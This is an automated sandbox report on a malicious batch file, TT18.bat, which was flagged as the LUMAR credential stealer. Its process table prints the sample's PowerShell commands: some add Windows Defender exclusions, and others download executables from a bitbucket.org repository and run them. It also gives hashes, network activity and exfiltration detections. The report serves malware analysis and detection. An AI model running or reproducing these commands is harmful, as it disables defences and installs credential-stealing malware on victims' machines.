File name:

TT18.bat

Full analysis: https://app.any.run/tasks/5b390bec-4411-4f78-878f-b8e040e15d5b
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: December 25, 2024, 18:51:54
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
stealer
povertystealer
lumar
exfiltration
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text
MD5:

BA49B0F74A40B906BBFD263339F6613E

SHA1:

EE7887B98A65EE94E7490F9F07FDFC5BBF90D9ED

SHA256:

829C5BA13F0ABF65356366C63A6B8DEA68D22F1C4232F28EB5257351C73A57FC

SSDEEP:

24:1suOu8JOsuEmu8j/OsuE6u8zUDSIsuE6DSXMDSQ:1s7ueOsrmuwOsr6ueUDSIsr6DSXMDSQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 2572)

    • Adds process to the Windows Defender exclusion list

      • cmd.exe (PID: 2572)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 5992)
      • powershell.exe (PID: 6232)

    • Actions looks like stealing of personal data

      • Installer.exe (PID: 7080)

    • LUMAR has been detected (SURICATA)

      • Installer.exe (PID: 7080)

  • SUSPICIOUS

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 2572)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2572)

    • Probably download files using WebClient

      • cmd.exe (PID: 2572)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 2572)

    • Script adds exclusion process to Windows Defender

      • cmd.exe (PID: 2572)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 5992)
      • powershell.exe (PID: 6232)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 5992)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2572)

    • Application launched itself

      • cmd.exe (PID: 2572)
      • Installer.exe (PID: 2076)

    • The executable file from the user directory is run by the CMD process

      • Installer.exe (PID: 2076)

    • Reads security settings of Internet Explorer

      • Installer.exe (PID: 7080)

    • Connects to unusual port

      • Installer.exe (PID: 7080)

    • The process connected to a server suspected of theft

      • Installer.exe (PID: 7080)

  • INFO

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3832)
      • powershell.exe (PID: 7108)
      • powershell.exe (PID: 6860)
      • powershell.exe (PID: 5788)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3832)
      • powershell.exe (PID: 7108)
      • powershell.exe (PID: 5788)
      • powershell.exe (PID: 6860)

    • The sample compiled with english language support

      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 5992)

    • Checks proxy server information

      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 5992)
      • powershell.exe (PID: 6232)

    • Disables trace logs

      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 5992)
      • powershell.exe (PID: 6232)

    • Reads the computer name

      • Installer.exe (PID: 2076)
      • Installer.exe (PID: 7080)

    • Checks supported languages

      • Installer.exe (PID: 2076)
      • Installer.exe (PID: 7080)

    • Reads the machine GUID from the registry

      • Installer.exe (PID: 2076)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • Installer.exe (PID: 7080)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
142
Monitored processes
12
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe powershell.exe no specs powershell.exe powershell.exe no specs powershell.exe powershell.exe no specs cmd.exe no specs installer.exe no specs #LUMAR installer.exe

Process information

PID
CMD
Path
Indicators
Parent process
436\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2076C:\Users\admin\AppData\Local\Temp\Installer.exe ;C:\Users\admin\AppData\Local\Temp\Installer.execmd.exe
User:
admin
Company:
𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏𓈏�
Integrity Level:
MEDIUM
Description:
Installer_online
Exit code:
0
Version:
6.9.3.19
Modules
Images
c:\users\admin\appdata\local\temp\installer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
2572C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\TT18.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
3832powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\admin\AppData\Local\Temp"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5788powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\admin\AppData\Local\Temp\agcore.dll"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
5992powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superpack1/1/downloads/agcore.dll', 'C:\Users\admin\AppData\Local\Temp\agcore.dll')";C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
6232powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superpack1/1/downloads/Installer.exe', 'C:\Users\admin\AppData\Local\Temp\Installer.exe')";C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
6656powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superpack1/1/downloads/System.Windows.ni.dll', 'C:\Users\admin\AppData\Local\Temp\System.Windows.ni.dll')";C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
6860powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\admin\AppData\Local\Temp\Installer.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
6992cmd.exe /c C:\Users\admin\AppData\Local\Temp\Installer.exe;C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
Total events
36 295
Read events
36 295
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
1
Text files
14
Unknown types
0

Dropped files

PID
Process
Filename
Type
3832powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:FBCAB5323F3CD3C109AB8568511CA699
SHA256:6B57630DD3DFA65A22BCA5D865258FCE79241A52781BFB7839AF116D2F58151C
3832powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yhspx4ji.ug1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7108powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_heissdz4.w14.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6656powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zglj1p04.ke2.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3832powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3thw1jsx.elq.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6656powershell.exeC:\Users\admin\AppData\Local\Temp\System.Windows.ni.dllexecutable
MD5:493928C1F496050032EA3C209646E829
SHA256:39F8BE0B1DC19EBD6222FD1DA1F1EAD148A192F9D833E207E350F01A8B643F88
5992powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u2xoc0dq.gor.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7108powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_upooyrio.ttn.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6656powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qhjt1yif.gbe.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6232powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wioyu3vg.c14.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
39
DNS requests
21
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.38.73.129:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
5640
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5640
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6148
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
732
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
192.168.100.255:137
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.38.73.129:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
unknown
5064
SearchApp.exe
2.21.110.146:443
www.bing.com
AKAMAI-AS
DE
whitelisted
1176
svchost.exe
40.126.32.138:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
whitelisted
www.microsoft.com
  • 23.38.73.129
  • 88.221.169.152
whitelisted
google.com
  • 142.250.186.46
whitelisted
www.bing.com
  • 2.21.110.146
  • 2.21.110.139
whitelisted
login.live.com
  • 40.126.32.138
  • 40.126.32.72
  • 40.126.32.133
  • 40.126.32.74
  • 40.126.32.68
  • 20.190.160.14
  • 40.126.32.76
  • 40.126.32.134
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted
bitbucket.org
  • 185.166.143.48
  • 185.166.143.49
  • 185.166.143.50
shared
bbuseruploads.s3.amazonaws.com
  • 52.217.164.233
  • 52.217.230.81
  • 3.5.29.252
  • 52.217.138.145
  • 3.5.29.227
  • 52.217.129.193
  • 52.217.173.153
  • 16.15.200.250
  • 3.5.22.165
  • 3.5.24.44
  • 52.217.164.73
  • 3.5.25.157
  • 16.182.66.57
  • 3.5.28.121
  • 16.15.177.25
  • 52.217.136.105
  • 54.231.224.17
  • 3.5.13.166
  • 54.231.163.177
  • 52.216.212.145
  • 54.231.162.233
  • 52.216.33.33
  • 3.5.17.203
  • 3.5.25.128
shared

Threats

PID
Process
Class
Message
7080
Installer.exe
A Network Trojan was detected
ET MALWARE LUMAR Stealer Exfiltration M2
7080
Installer.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] LUMAR Exfiltration
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
TT18.bat